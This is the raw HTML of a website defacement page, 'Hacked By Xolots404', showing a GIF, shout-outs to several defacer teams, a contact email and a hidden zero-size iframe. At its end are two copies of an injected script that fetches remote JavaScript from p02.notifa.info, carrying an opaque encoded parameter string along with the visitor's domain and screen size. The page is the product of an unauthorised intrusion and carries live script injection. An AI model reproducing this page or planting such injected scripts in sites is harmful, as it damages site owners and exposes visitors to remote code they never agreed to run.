
<html>
<head>
<link rel="icon" type="image/png" href="https://cdn130.picsart.com/294897482032201.png">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hacked By Xolots404</title>
<meta property="og:image" content="https://cdn130.picsart.com/294897482032201.png">
<meta name="description" content="Xolots404">
<meta name="og:title" content="Hacked By Xolots404">
<meta name="googlebot" content="index,follow">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">
<meta name="distribution" content="global">
<meta name="og:description" content="Xolots404">
<link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet">
<style>
body{color="black";font-family: 'Iceberg', sans-serif;}
</style></head>

<body bgcolor="black">
<table width="100%" height="100%"><tbody><tr><td align="center">
<img src="https://i.giphy.com/media/3oriNM8HF8oijarwre/200w.webp" width="40%"> 
<br>
<font size="5" color="white"><b>ҳ̸Ҳ̸ҳ Hacked By Xolots404 ҳ̸Ҳ̸ҳ</b></font><br><br>
<font size="3" color="white"><b>Broken Heart</b></font><br>
<font size="3" color="white"><b>Nothing Person Love Me</b></font>
<br><br>
<font size="4" color="white"><b>● Array - ./Fell Ganss - MssXCode - ARI4NDA - micin ●</b></font>
<br><br>
<iframe width="0" height="0" src="https://isilagu" frameborder="0" loop="true" allow fullscreen></iframe><br><br><font size="4" color="white">●<font size="4" color="dodgerblue"><b> Manusia Biasa Team <font size="4" color="white">- Wibu Defacer Team - Aceh Cyber Team ●</b></font><br>
<font color="red">[ <font color="white"> Contact me : dakochan64@gmail.com<font color="red"> ] 
</td></tr></tbody></table>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAy78AD0RTicmqO0t%2fLlc9ctTY%2fJASs1wI%2fGN1YDZTk1nVyj55Z65xPJAZPerBvaopku8MgJiAg7uxqKOOnWRmGtfMd%2b4%2bCFIfaVOYHzG2jLcuCIeN%2bPv8hmFRZ3itF0wUx1FOr1Y3RbyTi6qGvCqj9TRQFORQTMlnkZw94E8zLBlGpHzDTGh7GymdYhIE1ol1n%2bktyyMRtuyDAklXdPR%2bfka9dsZgsX4mhs%2bXA4aW4PvQ7NG5LYaIM1w4ZlaOwBcP2N9AmMz0%2fHsmJFsNjsB%2bmYIUcaEjBpPMW7Ogu1BhapRQiYXkxeqEQSousvXr2QjfvYduF43JFB%2bs8tyJPZ%2bctlcPkGcZ4ka2HgFAA2Q3UVfrsHQ2eR7hvNjskluy1U5bGpFmWHTdJXxfos2mzygG7OlTTLZ7J6jbx%2fCvReLmzOplYEDL%2fQs9oysVB8mdn4vYj00Z%2blLqjxkSvTv7v8S02u1ZWd4A3fCOGwiNIDIAcLRcjNimhDLVvpHmifK5%2ft52nL2q%2bADd76HESc5l62vHdQU9vTSopgPAEKPgG0kQiPxGfj35kwKKxpF5eU6CS9ye" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAc489qpDPM3zLewoiv2HlT6k%2fiqNWvr2ezQovKqWPkne9Cwuh0tRU%2bjRgrxu5598aej%2fs%2bacgcwnuzaY4IeyyJNkph47J88caQWJmm0GjuaxJ9dKmgiEbR6mQlov%2fG07vi7g0pOXwxwU43moYHb2LKSrbhWF834VUsjmYB3isqqcjE2zpU0kNn%2bXqvP1vapx4nAIoRpnzTI7yfWq9agmiJGkW6jnZBldeaNjGyhYWJLpmZgPw9pOYwkGYOExyFmWuFYMH1aEJEiVn%2bX9cHE%2fxao8dhqioas3tx1hfy5ceqUm%2fJgnbxQDDTUi6O9x9HiW7s6ysQ0Cs5TWbPeKTzDpsrAVncnf2UVSd1L4hu8c98fN8uxdYk%2bnatz2yPDRdVt3K91buFYKbL1BXkn4n8OymwAfMHTXrDePgtdIhCgrCsUU8GzUgHc6edsQnRYf6yu%2bavX7xxP0DAOt%2bopKFoljZiNwxJMPhSetv%2btmdXAeBtJY8tnxqAHSFYB62p5J5Wgxcai9B3Uc1lbpIUZe6YRaCAqJX8gkrdSdRh%2fHcyeCMwxHqVRdWy4GV2d9ZouqfjiIp" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>